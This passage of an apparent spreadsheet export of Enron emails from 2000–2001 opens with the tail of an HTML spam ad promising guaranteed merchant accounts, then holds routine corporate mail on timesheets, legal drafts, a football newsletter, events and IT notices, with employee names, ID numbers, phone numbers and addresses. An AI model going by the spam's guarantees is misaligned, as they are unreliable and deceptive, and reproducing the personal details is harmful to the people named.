You are pre-approved&lt;/FONT&gt;_x000D_
&lt;/P&gt;&lt;P ALIGN=CENTER&gt;&lt;FONT  COLOR="#0000ff" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=6 PTSIZE=20 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;a HREF="http://www.mortgroup.com" #000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE="2" PTSIZE="10" FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;Click Here&lt;/a&gt;&lt;/FONT&gt;_x000D_
&lt;/P&gt;&lt;P ALIGN=CENTER&gt;&lt;FONT  COLOR="#0000ff" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE=6 PTSIZE=20 FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;&lt;a HREF="http://www.mortgroup.com%3eYou%20are%20100%25Guaranteed%20to%20get%20a%20merchant%20account!%20Click%20here%3c/a%3e%3c/FONT%3e%3cFONT%20%20COLOR=" #000000" BACK="#ffffff" style="BACKGROUND-COLOR: #ffffff" SIZE="2" PTSIZE="10" FAMILY="SANSSERIF" FACE="Arial" LANG="0"&gt;_x000D_
  &lt;BR&gt;_x000D_
In order to remove your name from our opt in list please click here&lt;/a&gt;&lt;/FONT&gt;_x000D_
&lt;/P&gt;&lt;/HTML&gt;</t>
  </si>
  <si>
    <t>Mon, 14 Aug 2000 08:19:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'sheila.walton@enron.com', 'ramona.perkins@enron.com', 'carmen.chavira@enron.com'})</t>
  </si>
  <si>
    <t>Employees that are listed in the Research Time Site that are not in_x000D_
 the Research Group</t>
  </si>
  <si>
    <t>Hello everyone:_x000D_
_x000D_
In doing the SAP timesheets this time I have discovered there are several_x000D_
people listed in the 105896 Cost Center - ORG. Unit #1424 (Research) that_x000D_
are no longer in the Research Group.  Shouldn't they be moved?_x000D_
_x000D_
They are:_x000D_
_x000D_
Alexios Kollaros 502373  Now with the new Power Co._x000D_
Farouk Lalji  501609  Analyst rotated out _x000D_
Ainsley Gaddis  400250  Summer Intern returned to School (last day the 11th)_x000D_
Mandeep Chahal 502876  Now with the new Power Co._x000D_
James Aimone  514849  Summer Intern returned to School (Last day the 11th)_x000D_
Roman Zadorozhny 501778  Now with another co. in Enron_x000D_
_x000D_
Please let me know if I need to do anything._x000D_
_x000D_
Thanks!_x000D_
_x000D_
Shirley</t>
  </si>
  <si>
    <t>Fri, 4 May 2001 09:50:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'mark.haedicke@enron.com', 'richard.sanders@enron.com', 'charles.ward@enron.com', 'w.duran@enron.com', 'brad.alford@enron.com', 'joseph.deffner@enron.com', 'lisa.mellencamp@enron.com'})</t>
  </si>
  <si>
    <t>El Paso -Petition for Declaratory Relief</t>
  </si>
  <si>
    <t>Attached is a draft of the declaratory judgment action prepared by Baker _x000D_
Botts, our outside counsel on this matter.  A conscious effort has been made _x000D_
for the petition to be short and sweet.  However, we need to make sure the _x000D_
underlying facts and the history of the transaction are described properly.  _x000D_
_x000D_
Please take a few moments to review this draft and forward me any comments by _x000D_
e-mail or fax (713-646-3490)._x000D_
_x000D_
Thanks._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
 - Petition for Declaratory Relief.DOC</t>
  </si>
  <si>
    <t>Tue, 26 Sep 2000 01:12:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>True Orange Fax/E-Mail #90</t>
  </si>
  <si>
    <t xml:space="preserve">---------------------- Forwarded by David M Gagliardi/TTG/HouInd on_x000D_
09/26/2000 08:12 AM ---------------------------_x000D_
_x000D_
_x000D_
mggagliardi@duke-energy.com on 09/26/2000 07:11:29 AM_x000D_
_x000D_
To:   DGagliardi@reliantenergy.com, David_Ricks@GSDM.com,_x000D_
Tony.A.Rogers@fritolay.com_x000D_
cc:_x000D_
_x000D_
Subject:  True Orange Fax/E-Mail #90_x000D_
_x000D_
_x000D_
_x000D_
---------------------- Forwarded by Michael_x000D_
Gagliardi/Hou-ComOps/EnergyTrading/PEC on 09/26/2000 07:21 AM_x000D_
---------------------------_x000D_
_x000D_
_x000D_
TruOrange@aol.com on 09/25/2000 06:57:31 PM_x000D_
_x000D_
To:   TruOrange@aol.com_x000D_
cc:    (bcc: Michael Gagliardi/Hou-ComOps/EnergyTrading/PEC)_x000D_
Subject:  True Orange Fax/E-Mail #90_x000D_
_x000D_
_x000D_
True Orange Fax/E-Mail Service_x000D_
Volume 8, Fax/E-Mail #90, Monday, September 25, 2000_x000D_
Jerry Scarbrough's True Orange, P. O. Box 26530, Austin, Texas 78755 -_x000D_
Phone_x000D_
512-795-8536_x000D_
_x000D_
UT-OU Set for 11 A.M. ABC Kickoff; Brown Laments Injured Tackles_x000D_
_x000D_
The Texas-Oklahoma game in Dallas has been selected for an ABC telecast and_x000D_
will begin at 11 a.m. on October 7. I told you several weeks ago I thought_x000D_
that would happen, and now it is official. It won't go to the entire_x000D_
nation,_x000D_
but it will go to more than just a normal regional. It is what they call a_x000D_
"split national game," which means that game and another game will divide_x000D_
the_x000D_
nation's viewing, presumably on close to a 50-50 basis._x000D_
If you can't make the game and want to watch it on TV, I would suggest you_x000D_
call your cable company to see if they are carrying the UT-OU game. If you_x000D_
are in the lower half of the country, the chances are pretty good that it_x000D_
will be on in your area._x000D_
* * * *_x000D_
Coach Mack Brown said at his Monday news conference freshman WR Roy_x000D_
Williams_x000D_
"should be ready to play this week and all the others are questionable."_x000D_
Williams suffered a bruised arm early in the game, and Brown said he is_x000D_
feeling good enough to practice when the team resumes drills on Tuesday._x000D_
But he said DT Shawn Rogers, who suffered a sprained ankle, is among those_x000D_
who are questionable, along with two other DTs, Stevie Lee (foot) and Ryan_x000D_
Haywood (shoulder). "We are really thin at defensive tackle," he said._x000D_
With 230-pound Reggie White of Oklahoma State averaging 5.4 yards per carry_x000D_
and 127.3 yards per game (No. 2 in the Big 12, No. 11 in the nation),_x000D_
primarily running between the tackles, Brown said the list of limping_x000D_
tackles_x000D_
is a major concern._x000D_
He said when Rogers teams with All-American Casey Hampton at the tackles,_x000D_
the_x000D_
Longhorns are very hard to run against. "They are the best, as a pair, that_x000D_
I've been around," he said. "They are the best we've coached or played_x000D_
against."_x000D_
Redshirt freshman Marcus Tubbs played well in Rogers' place, Brown said,_x000D_
"but_x000D_
we need to get Shawn back." He also said Rogers is good enough that he_x000D_
could_x000D_
miss most of the practices this week and still be able to play at a high_x000D_
level if his ankle permits it._x000D_
Brown said Hampton and Tubbs are the starters, with little used substitute_x000D_
Miguel McKay the only healthy DT in reserve. He said he is hoping Lee's_x000D_
foot_x000D_
improves enough to allow him to play, but said the coaches are "going to_x000D_
talk_x000D_
to some of the kids" to see who might want to help out at tackle. He said_x000D_
sophomore Cole Pittman, a former DT, and true freshman Kalen Thornton are_x000D_
both 270-pound DEs who could pinch hit at tackle._x000D_
"Reggie White will be a big test for us, especially if Shawn can't play,"_x000D_
he_x000D_
said._x000D_
* * * *_x000D_
RECRUITING NOTES: Two national blue-chippers took their official visits to_x000D_
Texas last weekend. FB James Buchanan of Sarasota, Fla., Cardinal Mooney,_x000D_
got_x000D_
home late Sunday night and DL Kaelen Jakes of Valencia HS in Placentia,_x000D_
Cal.,_x000D_
got home Monday morning. Buchanan said he met with coach Brown for about an_x000D_
hour and he said Brown told him he needs to know as soon as possible what_x000D_
his_x000D_
plans are "so I could let them know if they needed to look somewhere else_x000D_
for_x000D_
a fullback." He said he really enjoyed his visit, and said he was_x000D_
pleasantly_x000D_
surprised to find that the UT business school is ranked No. 5 in the_x000D_
country._x000D_
"I had a really good time," he said. "The players and coaches were really_x000D_
down to earth, but I want to visit Florida (on Oct. 6) and I want to get_x000D_
back_x000D_
to Florida State again before I decide anything." He said Texas "is right_x000D_
up_x000D_
there. I really like the Longhorns." Jakes, who lived in Plano when he was_x000D_
in_x000D_
junior high, said he had "forgotten how friendly people are in Texas and_x000D_
how_x000D_
much they like their football." He said he had a great time, but also wants_x000D_
to take another visit or two before deciding anything. The Longhorns have_x000D_
16_x000D_
commitments and probably will sign 22 to 25 players._x000D_
* * * *_x000D_
BASEBALL RECRUITING: The Longhorn baseball team  got a commitment Monday_x000D_
from_x000D_
Donald Lavinski, 6-4, 205, a hard-throwing righthanded pitcher from Class_x000D_
2A_x000D_
state champ Weimar. He was 14-1 last season and averaged almost two_x000D_
strikeouts per inning. He has good control and walked only 25 batters in 95_x000D_
innings. He has been clocked as high as 93 miles per hour. He had an 0.70_x000D_
ERA. He visited Texas last weekend._x000D_
* * * *_x000D_
My next fax/e-mail will be whenever events warrant._x000D_
* * * *_x000D_
The True Orange Fax Service includes  at  least  99 faxes  a year and costs_x000D_
$99 ($79 by E-Mail). The True Orange Newsletter includes  26 newsletters_x000D_
and_x000D_
is published weekly during football season and twice monthly during most of_x000D_
the other months. It costs $45. Save by subscribing to both for $130 (or_x000D_
$110_x000D_
if you take the faxes via E-Mail  or $99 if you take the faxes and_x000D_
newsletter_x000D_
via E-Mail). Send check  to address at the top of page. I also  update my_x000D_
900 number ?1-900-288-8839 ?frequently with recruiting news. My E-Mail_x000D_
address is: truorange@aol.com_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 25 May 2001 13:58:07 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: Indo American Chamber of Commerce Gala Dinner</t>
  </si>
  <si>
    <t>Vasant,_x000D_
_x000D_
We can sponsor one table. What do you think is the appropriate _x000D_
level of sponsorship?_x000D_
_x000D_
Vince_x000D_
_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Shanbhogue, Vasant  _x000D_
Sent:	Friday, May 25, 2001 11:39 AM_x000D_
To:	Kaminski, Vince J_x000D_
Subject:	Indo American Chamber of Commerce Gala Dinner_x000D_
_x000D_
Hi Vince,_x000D_
_x000D_
	Chitra wanted me to check with you to see if you (Enron Research) would be interested in sponsoring a table at the annual gala dinner with the Consul General, and the Indian Ambassador.  People associated with India projects (Sandeep, Krishna, etc) may benefit.  Of course, if you are sponsoring, I would like to be invited.  _x000D_
_x000D_
	EBS is sponsoring one table, and that is the only Enron participation so far.  _x000D_
_x000D_
http://www.iaccgh.com/news/gala2001.htm_x000D_
_x000D_
Vasant</t>
  </si>
  <si>
    <t>Mon, 10 Jan 2000 11:32:00 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'victor.lamadrid@enron.com', 'katherine.kelly@enron.com'})</t>
  </si>
  <si>
    <t>TTT WORKSHOP</t>
  </si>
  <si>
    <t xml:space="preserve">I probably won't be able to go.  Could we send 2 people??_x000D_
---------------------- Forwarded by Chris Germany/HOU/ECT on 01/10/2000 07:31 _x000D_
PM ---------------------------_x000D_
_x000D_
_x000D_
Molly LaFuze_x000D_
01/10/2000 03:59 PM_x000D_
To: VCoen@CNGT.CNG.com_x000D_
cc: Chris Germany/HOU/ECT@ECT, Katherine L Kelly/HOU/ECT@ECT, Victor _x000D_
Lamadrid/HOU/ECT@ECT _x000D_
Subject: TTT WORKSHOP_x000D_
_x000D_
PLEASE SIGN ME UP TO ATTEND:_x000D_
Houston-The Westin Oaks  January 20, 2000 2:00 p.m. to 4:00 p.m._x000D_
THANKS - MOLLY_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Tue, 23 Jan 2001 08:25:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Reminder: Bear Trap - Jan. 30</t>
  </si>
  <si>
    <t xml:space="preserve">FYI, I think this is interesting.  I won't be able to attend but do you have _x000D_
any time to see some of this.  The morning looks interesting.  What do you _x000D_
think?_x000D_
m_x000D_
---------------------- Forwarded by Mike McConnell/HOU/ECT on 01/23/2001 _x000D_
04:22 PM ---------------------------_x000D_
From: Marty Sunde@EES on 01/23/2001 03:36 PM_x000D_
To: Mike McConnell/HOU/ECT@ECT_x000D_
cc: Julie Davidson/HOU/EES@EES, Zlatica Kraljevic/HOU/EES@EES _x000D_
Subject: Reminder: Bear Trap - Jan. 30_x000D_
_x000D_
	_x000D_
_x000D_
Mike:_x000D_
_x000D_
On Tuesday, January 30, 2001, selected business units within EES will be _x000D_
sharing their business and marketing plans for 2001. These plans incorporate _x000D_
the lessons learned from last's year activities. The Bear Trap program was _x000D_
initiated two years ago to help our Origination teams filter down the _x000D_
universe of prospects to those offering the best probability of closing _x000D_
deals. _x000D_
_x000D_
This year we will have the most comprehensive Bear Trap session ever.  We _x000D_
want you to be part of this exciting process and to broaden the relationship _x000D_
we have with you and your teams.  Come and join me on Tuesday, January 30th, _x000D_
at the Aerial Theater in Bayou Place, downtown Houston, starting at 7:00 AM _x000D_
with breakfast and continuing until 5:30 PM.  If you have not RSVP'd yet, _x000D_
please have your office call Julie Davidson at x- 36882 to confirm your _x000D_
attendance._x000D_
_x000D_
See you there._x000D_
_x000D_
Marty Sunde_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Mon, 9 Jul 2001 16:21:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'jill.lafave@enron.com', 'm..love@enron.com', 'steve.venturatos@enron.com', 'thu.dang@enron.com', 'chad.ihrig@enron.com', 'carol.chew@enron.com', 'sheila.glover@enron.com', 'c..gossett@enron.com', 'kelly.lombardi@enron.com', 'brian.gillis@enron.com', 'c..giron@enron.com', 'willie.harrell@enron.com', 'patrick.scales@enron.com', 'jeremy.wong@enron.com', 'david.baumbach@enron.com', 'nancy.hernandez@enron.com', 'kirti.patel@enron.com', 'frank.prejean@enron.com', 'thomas.araujo@enron.com', 'kathy.reeves@enron.com', 's..lim@enron.com', 'd..sorenson@enron.com', 'john.swinney@enron.com', 'shari.mao@enron.com', 'sanjeev.gupta@enron.com', 'john.jacobsen@enron.com', 'gladys.tan@enron.com', 'r..brackett@enron.com', 'zhiyong.wei@enron.com', 'kevin.sweeney@enron.com', 'a..brown@enron.com', 'errol.mclaughlin@enron.com', 'kenny.nicoll@enron.com', 'kam.keiser@enron.com', 'j..hanson@enron.com', 'sue.vasan@enron.com', 'patryk.wlodarski@enron.com', 'chris.abel@enron.com', 'dimitri.taylor@enron.com'})</t>
  </si>
  <si>
    <t>Decommissioning of IQ reports tonight</t>
  </si>
  <si>
    <t>All,_x000D_
_x000D_
Please note that IQ reports will be decommissioned tonight.  Please ensure that you can access the web reports at http://ermreports.corp.enron.com_x000D_
_x000D_
If you have any problems or queries, please contact Kirti Patel at x33587._x000D_
_x000D_
Thanks &amp; regards,_x000D_
_x000D_
Karima Husain_x000D_
Project Manager, TAGG/ERMS_x000D_
(713) 345-7252_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Husain, Karima  _x000D_
Sent:	Thursday, July 05, 2001 2:58 PM_x000D_
To:	Chew, Carol; Gillis, Brian; Nicoll, Kenny; Reeves, Kathy; Tan, Gladys; Taylor, Dimitri; Wlodarski, Patryk; Abel, Chris; Araujo, Thomas; Baumbach, David; Brackett, Debbie R.; Brown, Matt A.; Dang, Thu; Gillis, Brian; Giron, Darron C.; Glover, Sheila; Gossett, Jeffrey C.; Hanson, Kristen J.; Harrell, Willie; Hernandez, Nancy; Ihrig, Chad; Jacobsen, John; Keiser, Kam; Lafave, Jill; Lim, Francis S.; Lombardi, Kelly; Love, Phillip M.; Mao, Shari; McLaughlin Jr., Errol; Prejean, Frank; Reeves, Kathy; Scales, Patrick; Sorenson, Jefferson D.; Sweeney, Kevin; Swinney, John; Vasan, Sue; Venturatos, Steve; Wei, Zhiyong; Wong, Jeremy_x000D_
Cc:	Patel, Kirti_x000D_
Subject:	Decommissioning of IQ reports_x000D_
_x000D_
All,_x000D_
_x000D_
This is a reminder that IQ reports will be decommissioned on Monday, July 9, 2001.  Please ensure that you have access to the web reports at http://ermreports.corp.enron.com._x000D_
_x000D_
If you have any problems or concerns, please contact Kirti Patel at x33587._x000D_
_x000D_
Thanks &amp; regards,_x000D_
_x000D_
Karima Husain_x000D_
Project Manager, TAGG/ERMS_x000D_
(713) 345-7252</t>
  </si>
  <si>
    <t>Mon, 9 Jul 2001 08:57:00 -0700 (PDT)</t>
  </si>
  <si>
    <t xml:space="preserve">P.S.  Have discussed with Dorothy and will attempt to capture in my proposed _x000D_
edits our discussion._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
_x000D_
_x000D_
_x000D_
	Jeff Dasovich_x000D_
	Sent by: Jeff Dasovich_x000D_
	07/09/2001 03:48 PM_x000D_
		_x000D_
		 To: &lt;dhunter@s-k-w.com&gt;_x000D_
		 cc: Ann.Cohn@sce.com, "'Barbara Barkovich (E-mail)'" _x000D_
&lt;brbarkovich@earthlink.net&gt;, "Dominic DiMare (E-mail)" _x000D_
&lt;dominic.DiMare@calchamber.com&gt;, "'Dorothy Rothrock (E-mail)'" _x000D_
&lt;drothrock@cmta.net&gt;, "'John Fielder (E-mail)'" &lt;fieldejr@sce.com&gt;, "'Phil _x000D_
Isenberg (E-mail)'" &lt;isenberg@hmot.com&gt;, "'Jeff Dasovich (E-mail)'" _x000D_
&lt;jdasovic@enron.com&gt;, "'Keith McCrea (E-mail)'" &lt;kmccrea@sablaw.com&gt;, "'Linda _x000D_
Sherif (E-mail)'" &lt;lys@a-klaw.com&gt;, "'Linda Sherif (E-mail 2)'" _x000D_
&lt;lysherif@yahoo.com&gt;, "'Gary Schoonyan (E-mail)'" &lt;schoongl@sce.com&gt;, "'John _x000D_
White (E-mail)'" &lt;vjw@cleanpower.org&gt;_x000D_
		 Subject: Re: REVISED Merged Leg Document_x000D_
_x000D_
Thanks.  I have minor, but substantive, edits to the direct access section _x000D_
that Dorothy did, which I believe more accurately capture the document that _x000D_
we previously delivered to Hertzberg and the discussions around that _x000D_
document.  My proposed edits will be distributed to everyone within the next _x000D_
30-60 minutes.  Thanks to Delaney for all the work._x000D_
_x000D_
Best,_x000D_
Jeff_x000D_
</t>
  </si>
  <si>
    <t>Wed, 6 Jun 2001 00:39:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: ENA/Blue Dog: Incumbency Certificate</t>
  </si>
  <si>
    <t xml:space="preserve">Maybe I'm wrong, but I don't think we've done that on the other two deals.  _x000D_
Kathleen would know._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Reuter, Marisa" &lt;MReuter@KSLAW.com&gt; on 06/05/2001 02:33:13 PM_x000D_
To: "'Kay.Mann@enron.com'" &lt;Kay.Mann@enron.com&gt;_x000D_
cc:  _x000D_
_x000D_
Subject: RE: ENA/Blue Dog: Incumbency Certificate_x000D_
_x000D_
For the escrow.  Unfortunately, Citibank's form contained the following_x000D_
language in the signature block: "In witness whereof, I have hereunto set my_x000D_
hand and affixed the corporate seal of the Company this ______ day of May,_x000D_
2001."_x000D_
_x000D_
-----Original Message-----_x000D_
From: Kay.Mann@enron.com [mailto:Kay.Mann@enron.com]_x000D_
Sent: Tuesday, June 05, 2001 12:04 PM_x000D_
To: Reuter, Marisa_x000D_
Subject: Re: ENA/Blue Dog: Incumbency Certificate_x000D_
_x000D_
_x000D_
_x000D_
Is this for the escrow or other docs?  I know Citibank does not require a_x000D_
corporate seal.  What BS!_x000D_
_x000D_
Kathleen is out sick, so it will be a day or two._x000D_
_x000D_
Kay_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
"Reuter, Marisa" &lt;MReuter@KSLAW.com&gt; on 06/05/2001 10:09:11 AM_x000D_
_x000D_
To:   "'Kathleen.Carnahan@enron.com'" &lt;Kathleen.Carnahan@enron.com&gt;_x000D_
cc:   "'kay.mann@enron.com'" &lt;kay.mann@enron.com&gt;, "Keffer, John"_x000D_
      &lt;JKeffer@KSLAW.com&gt;_x000D_
_x000D_
Subject:  ENA/Blue Dog: Incumbency Certificate_x000D_
_x000D_
_x000D_
Kathleen:_x000D_
_x000D_
Paul Hastings would like ENA to resign the Incumbency Certificate, since_x000D_
the_x000D_
original Certificate did not affix the corporate seal.  Could you_x000D_
coordinate_x000D_
this and make sure the seal is affixed to the new Certificate?  Thanks._x000D_
_x000D_
Call me if you have any questions._x000D_
_x000D_
Regards,_x000D_
_x000D_
Marisa_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
                    Confidentiality Notice_x000D_
This message is being sent by or on behalf of a lawyer.  It is intended_x000D_
exclusively for the individual or entity to which it is addressed.  This_x000D_
communication may contain information that is proprietary, privileged or_x000D_
confidential or otherwise legally exempt from disclosure.  If you are not_x000D_
the named addressee, you are not authorized to read, print, retain, copy or_x000D_
disseminate this message or any part of it.  If you have received this_x000D_
message in error, please notify the sender immediately by e-mail and delete_x000D_
all copies of the message._x000D_
_x000D_
_x000D_
(See attached file: Reuter, Maria I. (Business E-Mail Address).vcf)_x000D_
_x000D_
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_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 27 Oct 2000 07:41:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'scott.healy@enron.com', 'heather.kroll@enron.com', 'stephen.plauche@enron.com'})</t>
  </si>
  <si>
    <t>Disregard redline</t>
  </si>
  <si>
    <t>She compared the wrong versions._x000D_
_x000D_
I'll try again.</t>
  </si>
  <si>
    <t>Tue, 6 Feb 2001 00:40:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Department of Water Resources, a div. of the State of CA - ISDA_x000D_
 request</t>
  </si>
  <si>
    <t xml:space="preserve">Samantha,_x000D_
_x000D_
Per our conversation, attached please find a credit worksheet for a draft _x000D_
Master ISDA Agreement between ENA and Department of Water Resources, a _x000D_
division of The State of California.  I recently spoke with Christian Yoder, _x000D_
who has more insight on DWR from a legal reps/warranties perspective.  Given _x000D_
the short time frame that we're under, he indicated that the Swap Legal Group _x000D_
can just provide a draft ISDA based on the attached credit terms without the _x000D_
financial legal eligibility details._x000D_
_x000D_
Christian Yoder will work with Sara Shackleton at a later time to iron out _x000D_
any eligibility issues, etc.  Should the swap legal team have any further _x000D_
questions regarding the above, please contact Christian Yoder in Portland._x000D_
_x000D_
Please call w/any questions to the credit terms that I have provided.  Thanks _x000D_
for your immediate attention._x000D_
_x000D_
Regards,_x000D_
Tracy_x000D_
503-464-8755_x000D_
</t>
  </si>
  <si>
    <t>Tue, 27 Nov 2001 12:50:24 -0800 (PST)</t>
  </si>
  <si>
    <t>frozenset({'lisa.burnett@enron.com', 'j..broderick@enron.com', 'iris.mack@enron.com', 'diana.allen@enron.com', 'jeffrey.miller@enron.com', 'keith.comeaux@enron.com', 'l..day@enron.com', 'hicham.benjelloun@enron.com', 'harry.arora@enron.com', 'dean.laurent@enron.com', 'reese.trejo@enron.com', 'seung-taek.oh@enron.com', 'david.ingram@enron.com', 'andrew.greer@enron.com', 'j..sturm@enron.com', 'gustavo.giron@enron.com', 'claudia.guerra@enron.com', 'maria.valdes@enron.com', 'joe.errigo@enron.com', 'e..kelly@enron.com', 'robert.benson@enron.com', 'lisa.shoemake@enron.com', 'jeff.king@enron.com', 'justin.laverell@enron.com', 'utku.gulmeden@enron.com', 'william.freije@enron.com', 'cory.willis@enron.com', 'alexander.mcelreath@enron.com', 'eric.saibi@enron.com', 'doug.gilbert-smith@enron.com', 'terri.clynes@enron.com', 'chris.lenartowicz@enron.com', 'mike.zipperer@enron.com', 'd..thomas@enron.com', 'russell.ballato@enron.com', 'gerald.gilbert@enron.com', 'bill.rust@enron.com', 'joe.capasso@enron.com', 'steve.pan@enron.com', 'anubhav.aggarwal@enron.com', 'benjamin.rogers@enron.com', 'steve.wang@enron.com', 'david.ryan@enron.com', 'clint.dean@enron.com', 'john.kinser@enron.com', 'don.baughman@enron.com', 'punit.rawal@enron.com', 'erik.serio@enron.com', 'hai.chen@enron.com', 'willis.philip@enron.com', 'jae.black@enron.com', 'daniel.jenkins@enron.com', 'patrick.hanse@enron.com', 'john.suarez@enron.com', 'dana.davis@enron.com', '/o=enron/ou=na/cn=recipients/cn=notesaddr/cn=a478079f-55e1f3b0-862566fa-612229@enron.com', 'amie.ha@enron.com', 'corry.bentley@enron.com', 'andy.pace@enron.com', 'mauricio.marquez@enron.com', 'richard.broussard@enron.com', 'ramanarao.tamma@enron.com', 'rika.imai@enron.com', 'jason.kaniss@enron.com', 'kevin.cline@enron.com', 'paul.schiavone@enron.com', 'juan.padron@enron.com', 'ted.ballinger@enron.com', 'kayne.coulter@enron.com', 'ashish.mahajan@enron.com', 'jason.choate@enron.com', 'todd.decook@enron.com', 'tom.may@enron.com', 'madhup.kumar@enron.com', 'd..baughman@enron.com', 'm..presto@enron.com', 'david.forster@enron.com', 'steve.olinde@enron.com', 'mike.carson@enron.com', 'l..garcia@enron.com', 'moises.benchluch@enron.com', 'm..forney@enron.com', 'laurel.bolt@enron.com', 'd..poppa@enron.com', 'robert.stalford@enron.com', 'beau.ratliff@enron.com', 'bryce.schneider@enron.com', 'michael.seely@enron.com', 'laura.podurgiel@enron.com', 'clayton.vernon@enron.com', 'jaime.gualy@enron.com', 'gautam.gupta@enron.com', 'lex.carroll@enron.com', 'joe.stepenovitch@enron.com', 'andy.rodriquez@enron.com', 'gerald.emesih@enron.com', 'jay.blaine@enron.com', 'oscar.dalton@enron.com', 'gretchen.lotz@enron.com', 'larry.valderrama@enron.com', 'f..campbell@enron.com', 'matt.lorenz@enron.com', 'dustin.collins@enron.com', 'ryan.williams@enron.com', 'peter.makkai@enron.com', 'carrie.larkworthy@enron.com', 'alan.chen@enron.com', 'david.maskell@enron.com', 'debra.bailey@enron.com', 'bill.abler@enron.com', 'mark.symms@enron.com', 'thomas.lowell@enron.com'})</t>
  </si>
  <si>
    <t>Breakfast/Lunch</t>
  </si>
  <si>
    <t>IF YOU ARE PLANNING ON EATING BREAKFAST AND LUNCH TOMORROW PLEASE COME SEE ME WITH CASH!!!!  _x000D_
_x000D_
THANKS_x000D_
_x000D_
T.Jae Black_x000D_
East Power Trading_x000D_
Assistant to Kevin Presto_x000D_
off. 713-853-5800_x000D_
fax 713-646-8272_x000D_
cell 713-539-4760</t>
  </si>
  <si>
    <t>Tue, 25 Sep 2001 09:12:01 -0700 (PDT)</t>
  </si>
  <si>
    <t>RE: March of Dimes' Wine Fest</t>
  </si>
  <si>
    <t xml:space="preserve">Steve,_x000D_
      This is landing at a bad time.  I'm going to be in Omaha going over the 2002 plan, and doing other business.  Unfortunately, I cannot reschedule this one so I'll have to miss the Wine fest._x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Hotte, Steve  _x000D_
Sent:	Tuesday, September 25, 2001 11:08 AM_x000D_
To:	McCarty, Danny_x000D_
Subject:	FW: March of Dimes' WineFest_x000D_
_x000D_
Will you and Judy be attending?_x000D_
_x000D_
 -----Original Message-----_x000D_
From: 	Nelson, Kimberly (ETS)  _x000D_
Sent:	Tuesday, September 25, 2001 9:31 AM_x000D_
To:	Regan, James; McCarty, Danny; Patel, Sophie; Santellan, Dan; Nicolay, Christi L.; Geaccone, Tracy; Hotte, Steve; Villarreal, Lillian; Schroeder, Maggie_x000D_
Cc:	Corman, Shelley_x000D_
Subject:	March of Dimes' WineFest_x000D_
_x000D_
Thank you for your hard work and your continued commitment to the March of Dimes. _x000D_
_x000D_
Enron's 2001 WalkAmerica campaign was the #14 Walk Team in Houston, contributing $72,563 to the March of Dimes. In addition, Danny McCarty was the #2 fundraiser in the city, raising $20,350, and Sophie Patel was the #5 fundraiser, raising $10,002._x000D_
_x000D_
In appreciation of all your efforts for WalkAmerica and the March of Dimes, you and a guest are invited to the 2001 March of Dimes' WineFest on Thursday, October 4 from 6:00 p.m. - 9:00 p.m. at the Crystal Ballroom of the Rice Hotel. It will be a great evening of food, wine, friends, and a silent auction._x000D_
_x000D_
Please let me know by Friday, September 28, if you will be able to attend WineFest 2001._x000D_
_x000D_
Thank you, again, and hope to see you there._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">You have received this email because you are listed as a security approver. _x000D_
Please click _x000D_
http://itcapps.corp.enron.com/srrs/auth/emailLink.asp?ID=000000000008853&amp;Page=_x000D_
Approval to review and act upon this request._x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Request ID          : 000000000008853_x000D_
Request Create Date : 12/1/00 10:08:24 AM_x000D_
Requested For       : cheryl.ingstad@enron.com_x000D_
Resource Name       : EOL US Backoffice  Reports_x000D_
Resource Type       : Applications_x000D_
_x000D_
_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Fri, 26 Jan 2001 07:34:00 -0800 (PST)</t>
  </si>
  <si>
    <t>Announcement</t>
  </si>
  <si>
    <t xml:space="preserve">Attached are the proposed letter to employees and response statement for any _x000D_
media inquiries.  Your comments and approval would be appreciated.  FYI, we _x000D_
have not had any more inquiries about Sanjay over the past two days and will _x000D_
not use either of these until you tell us to proceed._x000D_
_x000D_
John_x000D_
</t>
  </si>
  <si>
    <t>Thu, 27 Jul 2000 00:58:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>Congrats!</t>
  </si>
  <si>
    <t xml:space="preserve">I see we passed $100,000,000,000!   That's a lot of zeros._x000D_
_x000D_
Congratulations, who would have predicted this when you got called back from _x000D_
your plane trip to work on this new trading idea.  You should be very proud.  _x000D_
We all are._x000D_
_x000D_
Mike_x000D_
</t>
  </si>
  <si>
    <t>Thu, 7 Sep 2000 08:14:00 -0700 (PDT)</t>
  </si>
  <si>
    <t>frozenset({'cwhite@texas.usta.com', 'suew2@aol.com', 'dbeck2land@dellnet.com', 'cwhite@viviance.com'})</t>
  </si>
  <si>
    <t>Sally's Austin Itinerary for 9/7/00</t>
  </si>
  <si>
    <t>Itinerary for Sally Beck_x000D_
Enron MBA Excellence Fund Scholars Dinner_x000D_
September 7, 2000_x000D_
_x000D_
_x000D_
_x000D_
_x000D_
Thur, Sept. 7 Southwest Flt. WN 2113  =20_x000D_
